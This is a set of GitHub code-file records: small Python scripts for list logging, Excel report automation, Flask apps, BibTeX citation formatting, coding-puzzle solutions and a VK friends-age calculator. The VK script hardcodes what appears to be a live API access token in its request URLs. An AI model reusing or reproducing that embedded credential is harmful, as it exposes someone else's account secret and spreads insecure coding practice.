{"seq_id":"38292748703","text":"import logging\r\nlogging.basicConfig(filename = \"list.log\", level = logging.DEBUG , format= '%(asctime)s %(levelname)s %(message)s')\r\n\r\nclass List:\r\n    logging.info(\"We are into list class\")\r\n\r\n    def reverse(self):\r\n        \"This function reverses a list\"\r\n        l= [3,4,5,6,7,[23,456,67,8,78,78],[345,56,87,8,98,9], (234,6657,6), {\"key1\": \"atha\", 234:[23,45,656]}]\r\n        logging.info(\"We are into 1st function\")\r\n\r\n        try:\r\n            l.reverse()\r\n            logging.info(\"The reverse of this list is %s\", l)\r\n            return l\r\n\r\n        except Exception as e:\r\n            logging.exception(e)\r\n\r\n\r\n\r\n    def Even(self):\r\n        \"This function finds the even numbers in a list\"\r\n        l= [1,2,3,4,5,6,7,8]\r\n        logging.info(\"We are into 2nd function\")\r\n\r\n        try:\r\n\r\n            for i in l:\r\n                if i%2==0:\r\n                    logging.info(\"The number %s is even\", i)\r\n\r\n        except Exception as e:\r\n            logging.exception(e)\r\n\r\n\r\n    def Odd(self):\r\n        \"This function finds the odd numbers in a list\"\r\n        l= [1,2,3,4,7,9,11,13,15]\r\n        logging.info(\"We are into 3rd function\")\r\n\r\n        try:\r\n\r\n            for i in l:\r\n                if i%2!=0:\r\n                    logging.info(\"The number %s is odd\", i)\r\n\r\n        except Exception as e:\r\n            logging.exception(e)\r\n\r\n    def Print_ineuron(self):\r\n        \"This function prints ineuron\"\r\n        l= [[1,2,3,4],(2,3,4,5,6),(3,4,5,6,7), set([23,4,5,45,4,4,5,45,45,4,5]),{'k1':\"sudh\",\"k2\":\"ineuron\", \"k3\": \"kumar\", 3:6,7:8},[\"ineuron\",\"data science\"]]\r\n\r\n        logging.info(\"We are into 4th function\")\r\n\r\n        try:\r\n            for i in l:\r\n                if type(i)== dict:\r\n                    for j in i.items():\r\n                        for g in j:\r\n                            if g== \"ineuron\":\r\n                                logging.info(\"The result is %s\", g)\r\n\r\n\r\n                if type(i)== list:\r\n                    for k in i:\r\n                        if k== \"ineuron\":\r\n                            logging.info(\"The result is %s and %s\", k, g)\r\n\r\n        except Exception as e:\r\n            logging.exception(e)\r\n\r\n    def product(self):\r\n        \"This function computes the 
product\"\r\n l = [[1, 2, 3, 4], (2, 3, 4, 5, 6), (3, 4, 5, 6, 7), set([23, 4, 5, 45, 4, 4, 5, 45, 45, 4, 5]),\r\n {'k1': \"sudh\", \"k2\": \"ineuron\", \"k3\": \"kumar\", 3: 6, 7: 8}, [\"ineuron\", \"data science\"]]\r\n\r\n logging.info(\"We are into 5th function\")\r\n\r\n try:\r\n j=1\r\n for i in l:\r\n if type(i)== list or type(i)== tuple:\r\n for k in i:\r\n if type(k)== int:\r\n j= j*k\r\n logging.info(\"The product is %s\", j)\r\n\r\n except Exception as e:\r\n logging.exception(e)\r\n\r\n\r\n\r\ncall= List()\r\ncall.reverse()\r\ncall.Even()\r\ncall.Odd()\r\ncall.Print_ineuron()\r\ncall.product()\r\n","repo_name":"AtharvOO1/AtharvOO1","sub_path":"List.py","file_name":"List.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"75248015554","text":"import sys\nimport csv\nimport pywintypes\nimport win32com.client as win32\nimport tkinter as tk\nfrom tkinter import filedialog\nfrom tkinter import messagebox\n\n\n\ndef aggr_counts(input_file):\n\t# read in VOIDDATE.TXT file to get counts.\n\tdata = [row for row in input_file]\n\t#print len(data)\n\tkey_dict = {}\n\tfor row in data:\n\t\t# get original key from pos.366(4)\n\t\torig_key = row[365:369]\n\t\t# get package code from pos. 278(3)\n\t\tpackage = row[277:280]\n\t\t# add keys/quantities to dictionary if there are non ZLD records\n\t\tif package != 'ZLD':\n\t\t\tif orig_key in key_dict:\n\t\t\t\tkey_dict[orig_key] += 1\n\t\t\telse:\n\t\t\t\tkey_dict[orig_key] = 1\n\treturn key_dict\n\ndef get_broker_codes(list):\n\trow = 4\n\tlol_dict = {}\n\tkey_cell = 'x'\n\twhile key_cell != 'None':\n\t\tkey_cell = str(list.Cells(row,4))\n\t\tkey_cell = key_cell.strip()\n\t\tbroker_cell = str(list.Cells(row,3))\n\t\tbroker_cell = broker_cell.strip()\n\t\t#print(key_cell, broker_cell)\n\t\tif key_cell in lol_dict:\n\t\t\tpass\n\t\telse:\n\t\t\tif broker_cell != 'SUPP' and broker_cell != 'None':\n\t\t\t\tlol_dict[key_cell] = broker_cell\n\t\trow += 1\n\tprint(lol_dict)\n\treturn lol_dict\n\n\n\ndef populate_excel(input_file,broker_report,list_of_lists):\n\t#read in list of lists\n\ttry:\n\t\tlol = excel.Workbooks.Open(list_of_lists)\n\texcept:\n\t\tprint(\"Failed to open list of lists\")\n\t\tsys.exit(1)\n\tlols = lol.Sheets('List of Lists')\n\tlol_dict = get_broker_codes(lols)\n\tlol.Close(True)\n\t#read in excel file\n\ttry:\n\t\twb = excel.Workbooks.Open(broker_report)\n\texcept:\n\t\tprint(\"Failed to open broker report\")\n\t\tsys.exit(1)\n\tws = wb.Sheets('PURGE DROPS')\n\tws.Range(\"D1\").EntireColumn.Clear()\n\tws.Range(\"L1\").EntireColumn.Delete()\n\tws.Range(\"L1\").EntireColumn.Delete()\n\tws.Range(\"C1\").EntireColumn.Insert()\n\tkey_dict = aggr_counts(input_file)\n\tval = ''\n\t# first usefull row in excel sheet is A7\n\trow = 7\n\t# add column header to output column\n\tws.Cells(4,14).Value = 'QTY'\n\tws.Cells(5,14).Value = 'MAILED'\n\t# add column header to broker column\n\tws.Cells(5,3).Value = 'VENDER'\n\tws.Cells(5,5).Value = 'REJECTS'\n\t# add column header to adj qty\n\tws.Cells(4,13).Value = 'ADJ'\n\tws.Cells(5,13).Value = 'QTY'\n\t# loop through keycodes\n\twhile val != 'TOTALS':\n\t\tval = ws.Cells(row,1).Value\n\t\t#print 'val: ', val\n\t\tif val != None:\n\t\t\tval = val.strip()\n\t\t# add quantity of non ZLD records on output, if any.\n\t\tif val in key_dict:\n\t\t\tws.Cells(row,14).Value = key_dict[val]\n\t\t\tws.Cells(row,3).Value = lol_dict[val]\n\t\t\tws.Cells(row,5).Value = ws.Cells(row,13).Value - 
ws.Cells(row,14).Value\n\t\trow += 1\n\trow = row - 1\n\ttotal_sum = '=SUM(O7:O' + str(row - 2) + ')'\n\t#ws.Cells(row,14).Formula = '=SUM(N7:N' + str(row - 2) + ')'\n\n\t# format cells with font, size, alignment\n\tws.Range(ws.Cells(4,14),ws.Cells(row,3)).Font.Name = \"Courier\"\n\tws.Range(ws.Cells(4,14),ws.Cells(row,3)).Font.Size = 8\n\tws.Range(ws.Cells(4,14),ws.Cells(row,3)).HorizontalAlignment = win32.constants.xlRight\n\t#ws.Range(ws.Cells(5,14),ws.Cells(row,3)).HorizontalAlignment = win32.constants.xlRight\n\t#ws.Range(ws.Cells(5,14),ws.Cells(row,3)).NumberFormat = \"###,##0\"\n\n\tws.Cells(row,5).Formula = '=SUM(E7:E' + str(row - 2) + ')'\n\tws.Range(ws.Cells(4,13),ws.Cells(row,3)).HorizontalAlignment = win32.constants.xlRight\n\tws.Range(ws.Cells(5,13),ws.Cells(row,3)).HorizontalAlignment = win32.constants.xlRight\n\tws.Columns.AutoFit()\n\t# delete DE INPUT column\n\tws.Range(\"F1\").EntireColumn.Delete()\n\t# delete TOTALS row\n\tws.Rows(row).EntireRow.Delete()\n\twb.Close(True)\n\texcel.Quit()\n\n\n\n\n\nexcel = win32.gencache.EnsureDispatch('Excel.Application')\nexcel.Visible = True\n\n# output_file_name = sys.argv[1]\n# broker_report = sys.argv[2]\n# prevent root window from appearing on screen\nroot = tk.Tk()\nroot.withdraw()\n# select voiddate file dialog box\nmessagebox.showinfo(message = \"Select the voiddate.txt file:\")\noutput_file_name = filedialog.askopenfilename()\nprint('voiddate file: ', output_file_name)\n# select broker report file dialog box\nmessagebox.showinfo(message = \"Select the EXCEL.XLS file:\")\nbroker_report = filedialog.askopenfilename()\nprint('broker_report: ', broker_report)\n# select list of lists file dialog box\nmessagebox.showinfo(message = \"Select the list of lists file:\")\nlist_of_lists = filedialog.askopenfilename()\nprint('list_of_lists: ', list_of_lists)\n\nwith open(output_file_name, 'r') as input_file:\n    populate_excel(input_file, broker_report,list_of_lists)\n","repo_name":"casssax/mic_broker","sub_path":"mic_broker.py","file_name":"mic_broker.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"36448046368","text":"from flask import Flask, request, jsonify, redirect, url_for, render_template\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.preprocessing import StandardScaler\nimport pandas as pd\n\napp = Flask(__name__)\n\n# Load and preprocess the data\ndf = pd.read_excel('datateste1.xlsx')\ncolumns_to_drop = [\n    \"BDNF (pg/mL)\", \"Irisin (ng/mL)\", \"FABP3 (pg/mL)\", \"FABP4 (pg/mL)\", \"Oxytocin (pg/mL)\",\n    \"Leptin (pg/mL)\", \"IL-8 (pg/mL)\", \"IL-6 (pg/mL)\", \"IP10 (pg/mL)\", \"MCP1 (pg/mL)\",\n    \"MIP1b (pg/mL)\", \"RANTES (pg/mL)\", \"VEGF (pg/mL)\", \"Pan-ApoE (ug/mL)\", \"ApoE4 (ug/mL)\",\n    \"ApoE4/ApoE (Pan-ApoE)\", \"ApoE4 pheno (type)\", \"Ab42/Ab40\", \"Noradrenaline (ng/mL)\",\n    \"L-Dopa\", \"Dopamine\", \"Dopac\", \"5-HIAA\", \"HVA\", \"Serotonine\", \"HVA/DA\", \"Dopac+HVA/DA\",\n    \"5-HIAA/5-HT\", \"Glutamate (μM)\", \"Glutamine\", \"Taurine\", \"Arginine\", \"GABA\",\n    \"Glutamate/GABA\", \"Glutamine/ Glutamate\", \"A7/A5\", \"MMSE\", \"Ab/tau\", \"Glutamine/ GABA\",\n    \"Lipoxin A4 (pg/mL)\", \"Cys-LT (pg/mL)\", \"LXA4/cys-LT\", \"GABA/ Glutamate\",\n    \"Total protein (mg/mL)\", \"Subjects\"\n]\ndf.drop(columns_to_drop, axis=1, inplace=True)\ndf.drop([25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 53, 54, 55, 56, 57, 58, 59, 60, 
61], inplace=True)\n\nX = df.iloc[:, 1:5].values\nPrevisor = df.iloc[:, 5:6].values\n\nx_treinamento, x_teste, y_treinamento, y_teste = train_test_split(X, Previsor, test_size=0.30, random_state=7)\n\nsc = StandardScaler()\nx_treinamento = sc.fit_transform(x_treinamento)\nx_teste = sc.transform(x_teste)\n\nmodel = RandomForestClassifier()\nmodel.fit(x_treinamento, y_treinamento.ravel())\n\n@app.route('/calculate', methods=['POST'])\ndef calculate():\n data = request.get_json()\n proteina1 = data['proteina1']\n proteina2 = data['proteina2']\n proteina3 = data['proteina3']\n values = sc.transform([[proteina1, proteina2, proteina3]])\n prediction = model.predict(values)[0]\n return jsonify({\"prediction\": prediction})\n\n@app.route('/results.html')\ndef show_result():\n prediction = request.args.get('prediction')\n return render_template('results.html', prediction=prediction)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"Toribrrs/Site_da_IC","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26879748646","text":"#! /usr/bin/python3\n\n# System imports\nimport argparse\nimport re\n\n# Package imports\nfrom bibtexparser.bparser import BibTexParser\nfrom bibtexparser.customization import convert_to_unicode, author, editor, page_double_hyphen\n\n\ndef customizations(record):\n \"\"\"Use some functions delivered by the library\n\n :param record: a record\n :returns: -- customized record\n \"\"\"\n record = convert_to_unicode(record)\n # record = type(record)\n record = author(record)\n record = editor(record)\n # record = journal(record) # Do not use!\n # record = keyword(record)\n # record = link(record)\n record = page_double_hyphen(record)\n # record = doi(record)\n return record\n\n\ndef load_bibtex(bibfile, customizer=None):\n # Open and parse the BibTeX file in `bibfile` using\n # `bibtexparser`\n with open(bibfile, 'r') as bib_file:\n bp = BibTexParser(bib_file.read(), customization=customizer)\n\n # Get a dictionary of dictionaries of key, value pairs from the\n # BibTeX file. 
The structure is\n # {ID:{authors:...},ID:{authors:...}}.\n refsdict = bp.get_entry_dict()\n\n return refsdict\n\n\nclass Processor:\n def __init__(self, refsdict):\n self.refsdict = refsdict\n # Check that all references have populated author, title and year fields\n for k, v in self.refsdict.items():\n assert 'author' in v or 'editor' in v, 'Missing field author/editor in {}'.format(k)\n assert 'title' in v, 'Missing field title in {}'.format(k)\n assert 'year' in v, 'Missing field year in {}'.format(k)\n\n def gen_replacement(self, match, skip_types=None):\n match_type = self.get_match_type(match.group())\n if skip_types is not None and match_type in skip_types:\n return None, None\n else:\n func = getattr(self, 'process_' + match_type, None)\n if func is not None:\n if match_type == 'multicite':\n match_strings = [string.strip() for string in match.group()[1:-1].split(';')]\n refIDs = [self.get_reference_ID(match_string) for match_string in match_strings]\n for refID in refIDs:\n assert refID in self.refsdict, 'Reference {} not found'.format(refID)\n return func([self.refsdict[refID] for refID in refIDs])\n else:\n refID = self.get_reference_ID(match.group())\n assert refID in self.refsdict, 'Reference {} not found'.format(refID)\n return func(self.refsdict[refID])\n return None, None\n\n def get_match_type(self, match_string):\n match_string = match_string.strip()\n if ';' in match_string and ':cite' in match_string:\n return 'multicite'\n elif ':cite' in match_string:\n return 'cite'\n else:\n assert ('@' in match_string and ':' in match_string and '[' in match_string and ']' in match_string), \\\n 'match_string must contain an at-symbol, a colon, a left and a right square bracket.'\n pos_colon = match_string.find(':')\n pos_rbracket = match_string.find(']')\n return match_string[pos_colon + 1 : pos_rbracket].strip()\n\n def get_reference_ID(self, match_string):\n match_string = match_string.strip()\n assert ('@' in match_string and ':' in match_string), \\\n 'match_string must contain an at-symbol and a colon.'\n pos_colon = match_string.find(':')\n pos_at = match_string.find('@')\n return match_string[pos_at + 1 : pos_colon].strip()\n\n def process_title(self, ref):\n if 'url' in ref:\n return '[' + ref['title'] + '](' + ref['url'] + ')', None \n else:\n return ref['title'], None \n\n def process_subtitle(self, ref):\n return ref.get('subtitle', None), None\n\n def process_journal(self, ref):\n return ref.get('journal', None), None\n\n def process_author(self, ref):\n if ref['ENTRYTYPE'].lower() == 'book' and 'editor' in ref:\n authors_list = [editor['name'] for editor in ref['editor']]\n else:\n authors_list = ref['author']\n num_authors = len(authors_list)\n if num_authors == 1:\n return authors_list[0].split(',')[0].strip(), None\n elif num_authors == 2:\n return authors_list[0].split(',')[0].strip() + \\\n ' and ' + authors_list[1].split(',')[0].strip(), None\n elif num_authors >= 3:\n return authors_list[0].split(',')[0].strip() + ' *et al.*', None\n\n def process_authors(self, ref):\n if ref['ENTRYTYPE'].lower() == 'book' and 'editor' in ref:\n authors_list = [editor['name'] for editor in ref['editor']]\n else:\n authors_list = ref['author']\n processed_authors_list = []\n for author in authors_list:\n a_name = author.split(',')\n a_name[0] = a_name[0].strip()\n a_name[1] = a_name[1].strip()\n processed_authors_list.append(a_name[1] + ' ' + a_name[0])\n if len(processed_authors_list) == 1:\n return processed_authors_list[0], None\n elif len(processed_authors_list) == 2:\n 
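# two parsed names are joined with ' and ', e.g. ['John Doe', 'Jane Roe'] -> 'John Doe and Jane Roe'\n            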
return processed_authors_list[0] + ' and ' + processed_authors_list[1], None\n elif len(processed_authors_list) >= 3:\n processed_authors_list[-1] = 'and ' + processed_authors_list[-1]\n return ', '.join(processed_authors_list), None\n\n def process_cite(self, ref):\n author = self.process_author(ref)[0]\n label = '[' + author + ', ' + ref['year'] + ']'\n citation = label + ' ' + self.process_citation(ref)[0]\n return label, citation\n\n def process_multicite(self, refs):\n labels = []\n citations = []\n for ref in refs:\n author = self.process_author(ref)[0]\n label = author + ', ' + ref['year']\n labels.append(label)\n citations.append('[' + label + '] ' + self.process_citation(ref)[0])\n multilabel = '[' + '; '.join(labels) + ']'\n multicitation = '\\n - '.join(citations)\n return multilabel, multicitation\n\n def process_booktitle(self, ref):\n return ref.get('booktitle', None), None\n\n def process_series(self, ref):\n return ref.get('series', None), None\n\n def process_month(self, ref):\n return ref.get('month', None), None\n\n def process_year(self, ref):\n return ref['year'], None\n\n def process_citation(self, ref):\n authors = self.process_authors(ref)[0]\n title = self.process_title(ref)[0]\n time = ref['year']\n if 'month' in ref:\n time = ref['month'] + ' ' + time\n\n if ref['ENTRYTYPE'].lower() == 'book':\n if 'subtitle' in ref:\n title = title + '. ' + ref['subtitle']\n citation = authors + '. *' + title + '*. '\n if 'publisher' in ref:\n citation = citation + ref['publisher'] + ', '\n\n elif 'thesis' in ref['ENTRYTYPE'].lower():\n citation = authors + '. *' + title + '*. '\n if ref['ENTRYTYPE'].lower() == 'phdthesis':\n citation = citation + 'PhD thesis, '\n elif ref['ENTRYTYPE'].lower() == 'mastersthesis':\n citation = citation + 'Masters thesis, '\n if 'school' in ref:\n citation = citation + ref['school'] + ', '\n\n elif ref['ENTRYTYPE'].lower() == 'inproceedings':\n citation = authors + '. ' + title + '. '\n citation = citation + 'In *' + ref['booktitle'] + '*, '\n if 'pages' in ref:\n citation = citation + 'pages ' + ref['pages'] + ', '\n\n elif ref['ENTRYTYPE'].lower() == 'article':\n citation = authors + '. ' + title + '. '\n citation = citation + '*' + ref['journal'] + '*, '\n if 'volume' in ref and 'number' in ref and 'pages' in ref:\n citation = citation + ref['volume'] + '(' + ref['number'] + '):' + ref['pages'] + ', '\n\n else:\n citation = authors + '. *' + title + '*. '\n\n citation = citation + time + '.'\n\n return citation, None\n\n def process_URL(self, ref):\n return ref.get('url', None), None\n\n def process_full(self, ref):\n authors = self.process_authors(ref)[0]\n title = self.process_title(ref)[0]\n time = ref['year']\n\n if 'month' in ref:\n time = ref['month'] + ' ' + time\n if ref['ENTRYTYPE'].lower() == 'book' and 'subtitle' in ref:\n title = title + '. 
' + ref['subtitle'] + '.'\n\n citation = '**' + title + '**\\n *' + authors + '*\\n '\n if ref['ENTRYTYPE'].lower() == 'book':\n if 'publisher' in ref:\n citation = citation + ref['publisher'] + ', '\n elif 'thesis' in ref['ENTRYTYPE'].lower():\n if ref['ENTRYTYPE'].lower() == 'phdthesis':\n citation = citation + 'PhD thesis, '\n elif ref['ENTRYTYPE'].lower() == 'mastersthesis':\n citation = citation + 'Masters thesis, '\n if 'school' in ref:\n citation = citation + ref['school'] + ', '\n elif ref['ENTRYTYPE'].lower() == 'inproceedings':\n citation = citation + ref['booktitle'] + ', ' \n elif ref['ENTRYTYPE'].lower() == 'article':\n citation = citation + ref['journal'] + ', '\n citation = citation + time\n\n return citation, None \n\n\ndef main(args):\n infile = args.infile\n bibfile = args.bibfile\n outfile = args.outfile\n\n refsdict = load_bibtex(bibfile, customizer=customizations)\n\n # Read infile\n with open(infile, 'r') as inf:\n inputs = inf.read()\n\n # Process locations of replacement patterns\n matches = list(re.compile('\\[[\\s]*@\\w*:\\w*[\\s]*\\]').finditer(inputs))\n cites = list(re.compile('\\[[\\w\\s@:;]*@\\w*:cite[\\w\\s@:;]*\\]').finditer(inputs))\n\n # Generate replacement and append strings for each reference\n processor = Processor(refsdict)\n all_matches = []\n for match in matches:\n replace_str, append_str = processor.gen_replacement(match)\n all_matches.append((match, replace_str, append_str))\n for match in cites:\n replace_str, append_str = processor.gen_replacement(match, skip_types=['cite'])\n all_matches.append((match, replace_str, append_str)) # duplication from cites is fine due to skip_types\n\n # Sort all_matches according to start position of match\n all_matches = sorted(all_matches, key=lambda j_match: j_match[0].start())\n\n # Generate output string\n outputs = inputs\n offset = 0\n for j_match in all_matches:\n match = j_match[0] \n replace_str = j_match[1]\n replace_start = offset + match.start()\n if replace_str is not None:\n outputs = outputs[:replace_start] + outputs[replace_start:].replace(match.group(), replace_str, 1)\n offset += len(replace_str) - len(match.group())\n\n # Append references to output string\n appends = '\\n' if outputs.endswith('\\n') else '\\n\\n'\n appends = appends + '## References\\n'\n for j_match in all_matches:\n match = j_match[0]\n append_str = j_match[2]\n if append_str is not None:\n appends = appends + '\\n - ' + append_str\n outputs = outputs + appends\n\n # Write output to file\n with open(outfile, mode='w') as outf:\n outf.write(outputs)\n\n\nif __name__ == \"__main__\":\n arg_parser = argparse.ArgumentParser(\n description=\"Replace references in a markdown file with proper attributes from a bib file.\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n arg_parser.add_argument(\"infile\",\n help=\"Path to the input markdown file.\",\n type=str)\n arg_parser.add_argument(\"-b\", \"--bibfile\",\n help=\"Path to the BibTeX reference file.\",\n default=\"biblio.bib\",\n type=str)\n arg_parser.add_argument(\"-o\", \"--outfile\",\n help=\"Path for the output markdown file.\",\n default=\"result.md\",\n type=str)\n\n args = arg_parser.parse_args()\n main(args)\n","repo_name":"nitinkamra1992/MDwithBib","sub_path":"md_with_bib.py","file_name":"md_with_bib.py","file_ext":"py","file_size_in_byte":12199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16208448578","text":"# -*-coding:utf-8-*-\n\n\"\"\"\nQuestion:\n Invert Binary Tree\n\n Invert a 
binary tree.\n\n 4\n / \\\n 2 7\n / \\ / \\\n 1 3 6 9\n to\n 4\n / \\\n 7 2\n / \\ / \\\n 9 6 3 1\n\n Trivia:\n This problem was inspired by this original tweet by Max Howell:\n Google: 90% of our engineers use the software you wrote (Homebrew), but you can’t invert a binary tree on a whiteboard so fuck off.\n\nPerformance:\n 1. Total Accepted: 40077 Total Submissions: 101621 Difficulty: Easy\n 2. Your runtime beats 48.69% of python submissions.\n\"\"\"\n\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution(object):\n def invertTree(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: TreeNode\n \"\"\"\n if root is None:\n return\n root.left, root.right = root.right, root.left\n if root.left:\n self.invertTree(root.left)\n if root.right:\n self.invertTree(root.right)\n return root\n\n\nn1 = TreeNode(1)\nn2 = TreeNode(2)\nn3 = TreeNode(3)\nn4 = TreeNode(4)\nn6 = TreeNode(6)\nn7 = TreeNode(7)\nn9 = TreeNode(9)\nn4.left = n2\nn4.right = n7\nn2.left = n1\nn2.right = n3\nn7.left = n6\nn7.right = n9\n\nSolution().invertTree(n4)\nassert n4.left == n7\nassert n4.right == n2\nassert n7.left == n9\nassert n7.right == n6\nassert n2.left == n3\nassert n2.right == n1\n","repo_name":"dchentech/leetcode","sub_path":"226-invert-binary-tree.py","file_name":"226-invert-binary-tree.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28513947854","text":"import requests\nfrom collections import Counter\nfrom datetime import datetime\n\n\ndef calc_age(uid):\n \n #получение id пользователя по username или user_id:\n #например,для пользователя с именем reigning установлен id 150617534\n api_url = 'https://api.vk.com/method/users.get?v=5.71&access_token=08a2534208a2534208a253427208d42e2f008a208a25342688c552d8a26bc12eca467d6&user_ids='\n #user_name_id = input(\"Enter user ID or nickname: \")\n user_name_id = str(uid)\n r = requests.get(api_url + user_name_id)\n #print(r.text)\n\n #разбор json\n data_name = r.json()\n user_store = data_name['response'][0]\n user_id = str(user_store['id'])\n\n\n #получение списка друзей:\n api_url = 'https://api.vk.com/method/friends.get?v=5.71&access_token=08a2534208a2534208a253427208d42e2f008a208a25342688c552d8a26bc12eca467d6&user_id='\n r = requests.get(api_url + user_id + '&fields=bdate')\n\n #разбор json и наполнение списка с возрастом\n data = r.json()\n print(data)\n friend_list = data ['response']['items']\n age_list = []\n for item in friend_list:\n if 'bdate' in item:\n birthday = item['bdate'].split('.')\n if (len(birthday) == 3):\n birthyear_number = datetime.now().year - int(birthday[2])\n age_list.append(birthyear_number)\n\n #подсчет одинаковых значений и сортировка списка с возрастом \n c = Counter(age_list)\n print(c)\n m = c.items()\n print(m)\n my_list = list(m)\n print(my_list)\n my_list_sorted = sorted(my_list, key=lambda point: (-point[1], point[0])) \n return my_list_sorted\n\n\nif __name__ == '__main__':\n res = calc_age('reigning')\n print(res)\n","repo_name":"fimv/API_VK","sub_path":"friendsNNGU.py","file_name":"friendsNNGU.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23470988711","text":"N = int(10E6)\r\nyolo = [0] * N\r\n\r\ndef reverse(i):\r\n\treturn int(str(i)[::-1])\r\n\r\ndef presolve():\r\n\tfor i in xrange(1, N):\r\n\t\tr = 
reverse(i)\r\n\t\tif i % 10 == 0 or r >= i:\r\n\t\t\tyolo[i] = 1 + yolo[i - 1]\r\n\t\telse:\r\n\t\t\tyolo[i] = 1 + min(yolo[r], yolo[i - 1])\r\n\t\t\r\ndef solve(n):\r\n\treturn yolo[n]\r\n\r\npresolve();\r\nn = int(raw_input())\r\ni = 0\r\n\r\nwhile i < n:\r\n\ti += 1\r\n\tx = int(raw_input())\r\n\tprint('Case #{}: {}'.format(i, solve(x)))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_162/344.py","file_name":"344.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17796850662","text":"class Solution:\n def repeatedNTimes(self, A: List[int]) -> int:\n A.sort()\n n = len(A)\n count = 1\n for i in range(1, n):\n count = count + 1 if A[i] == A[i - 1] else 1\n if count == n / 2:\n return A[i]\n return A[-1]\n","repo_name":"AmitHasanShuvo/Programming","sub_path":"leetcode961again.py","file_name":"leetcode961again.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"24273848741","text":"from typing import ForwardRef, Generic, TypeVar\n\nT = TypeVar(\"T\")\n\nERR_TXT = \"return type hint not wrapped in Col[...]\"\n\n\nclass Col(Generic[T]):\n pass\n\n\ndef get_hint_col_type(rethint):\n assert is_type_hint_origin(rethint, Col), ERR_TXT\n arg = rethint.__args__[0]\n if isinstance(arg, ForwardRef):\n return arg.__forward_arg__\n return arg\n\n\ndef is_type_hint_origin(hint, cls):\n try:\n return hint.__origin__ is cls\n except AttributeError:\n return False\n\n\ndef get_return_hint(fun):\n ret_annotation = getattr(fun, \"__annotations__\", {}).get(\"return\")\n if ret_annotation is None:\n return None\n return get_hint_col_type(ret_annotation)\n","repo_name":"endremborza/colassigner","sub_path":"colassigner/type_hinting.py","file_name":"type_hinting.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18150451167","text":"import sys\nfrom collections import deque\nsys.stdin = open('input.txt', \"r\")\n'''\n용사는 1,1 에서 시작\n0 빈공간\n1 마법의 벽\n2 전설의 명검 그람\n'''\nY, X, T = map(int, sys.stdin.readline().rstrip().split(' '))\nboard = []\ncheckOne = [[0]*X for _ in range(Y)]\ncheckTwo = [[0]*X for _ in range(Y)]\nfor _ in range(Y):\n board.append(list(map(int, sys.stdin.readline().rstrip().split(' '))))\n\nqueue = deque([[0, 0, 0, False]])\ncheckOne[0][0] = 1\n\ndirection = [[1, 0], [-1, 0], [0, 1], [0, -1]]\nwhile queue:\n y, x, cnt, getSword = queue.popleft()\n\n for dx, dy in direction:\n ty = dy+y\n tx = dx+x\n\n # 범위 확인\n if 0 <= ty < Y and 0 <= tx < X:\n if ty == Y-1 and tx == X-1:\n print(cnt+1)\n exit()\n\n if cnt >= T:\n print('Fail')\n exit()\n\n # 칼 얻엇을경우\n if getSword and checkTwo[ty][tx] == 0:\n checkTwo[ty][tx] = 1\n queue.append([ty, tx, cnt+1, True])\n # 칼 없을경우\n else:\n\n if board[ty][tx] == 0 and checkOne[ty][tx] == 0:\n checkOne[ty][tx] = 1\n queue.append([ty, tx, cnt+1, False])\n elif board[ty][tx] == 2:\n checkOne[ty][tx] = 1\n queue.append([ty, tx, cnt+1, True])\n\nprint('Fail')\n","repo_name":"aver1001/Problem-Solving","sub_path":"풀이 완료/17836/acmicpc.py","file_name":"acmicpc.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42224358686","text":"from flask import Flask, jsonify\nimport numpy as np\nimport sqlalchemy\nfrom sqlalchemy.ext.automap 
import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\n# create engine to hawaii.sqlite\nengine = create_engine(\"sqlite:///hawaii.sqlite\")\n# reflect an existing database into a new model\nBase = automap_base()\n# reflect the tables\nBase.prepare(engine, reflect=True)\n# Save references to each table\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n# Create our session (link) from Python to the DB\nsession = Session(engine)\n\n#Flask Setup\napp = Flask(__name__)\n\n#Flask Routes\n\n@app.route(\"/\")\ndef welcome():\n return (\n \"Welcome to Home Page!
\"\n \"Available Routes:
\"\n \"/api/v1.0/precipitation
\"\n \"/api/v1.0/stations
\"\n \"/api/v1.0/tobs
\"\n \"/api/v1.0/start
